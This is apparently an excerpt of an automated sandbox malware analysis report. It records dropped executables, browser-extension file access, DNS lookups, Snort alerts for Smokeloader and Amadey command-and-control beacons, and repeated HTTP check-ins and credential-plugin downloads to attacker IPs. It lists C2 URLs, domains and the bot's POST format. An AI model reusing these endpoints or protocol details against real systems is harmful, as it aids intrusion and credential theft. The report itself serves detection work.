                      Source: Binary string: C:\cekezuca_v.pdb source: E35A.exe, 00000018.00000000.442927876.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, E35A.exe.1.dr
                      Source: Binary string: C:\zuc.pdb source: F771.exe, 00000020.00000000.454432318.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, F771.exe.1.dr
                      Source: Binary string: _.pdb source: F771.exe, 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\giroyid.pdb source: A852.exe, 0000000C.00000000.410237747.0000000000401000.00000020.00000001.01000000.00000009.sdmp, rovwer.exe, 0000000E.00000000.421565865.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe, 0000001A.00000000.445061282.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe.12.dr, A852.exe.1.dr
                      Source: Binary string: @C:\cekezuca_v.pdb source: E35A.exe, 00000018.00000000.442927876.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, E35A.exe.1.dr
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00420B76 FindFirstFileExW,

                      Networking

                      barindex
                      Source: C:\Windows\explorer.exeDomain query: cdn-102.anonfiles.com
                      Source: C:\Windows\explorer.exeDomain query: bitbucket.org
                      Source: C:\Windows\explorer.exeDomain query: bbuseruploads.s3.amazonaws.com
                      Source: C:\Windows\explorer.exeDomain query: github.com
                      Source: C:\Windows\explorer.exeDomain query: raw.githubusercontent.com
                      Source: C:\Windows\explorer.exeDomain query: o36fafs3sn6xou.com
                      Source: C:\Windows\explorer.exeDomain query: anonfiles.com
                      Source: C:\Windows\explorer.exeDomain query: hoteldostyk.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 80
                      Source: C:\Windows\explorer.exeDomain query: iplogger.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.56.146.174 80
                      Source: C:\Windows\explorer.exeDomain query: srshf.com
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeDomain query: 1ecosolution.it
                      Source: C:\Windows\explorer.exeNetwork Connect: 193.56.146.168 80
                      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49727 -> 77.232.37.228:80
                      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49730 -> 77.232.37.228:80
                      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49736 -> 77.232.37.228:80
                      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49745 -> 193.56.146.174:80
                      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49744 -> 193.56.146.174:80
                      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49746 -> 193.56.146.174:80
                      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49747 -> 193.56.146.174:80
                      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49748 -> 193.56.146.174:80
                      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49749 -> 193.56.146.174:80
                      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49750 -> 193.56.146.174:80
                      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49751 -> 193.56.146.174:80
                      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49752 -> 193.56.146.174:80
                      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49753 -> 193.56.146.174:80
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 3000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49824
                      Source: C:\Windows\explorer.exeDNS query: name: iplogger.com
                      Source: Malware configuration extractorURLs: 185.106.92.111:2510
                      Source: Malware configuration extractorURLs: http://o3l3roozuidudu.com/
                      Source: Malware configuration extractorURLs: http://o3npxslymcyfi2.com/
                      Source: Malware configuration extractorURLs: http://o3b1wk8sfk74tf.com/
                      Source: Malware configuration extractorURLs: https://t.me/deadftx
                      Source: Malware configuration extractorURLs: https://www.tiktok.com/@user6068972597711
                      Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: GET /g84kvj4jck/Plugins/cred64.dll HTTP/1.1Host: 193.56.146.174
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODMwNzI=Host: 193.56.146.174Content-Length: 83224Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
                      Source: global trafficHTTP traffic detected: GET /446391140202.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Host: 193.56.146.174Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODMwNzI=Host: 193.56.146.174Content-Length: 83224Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
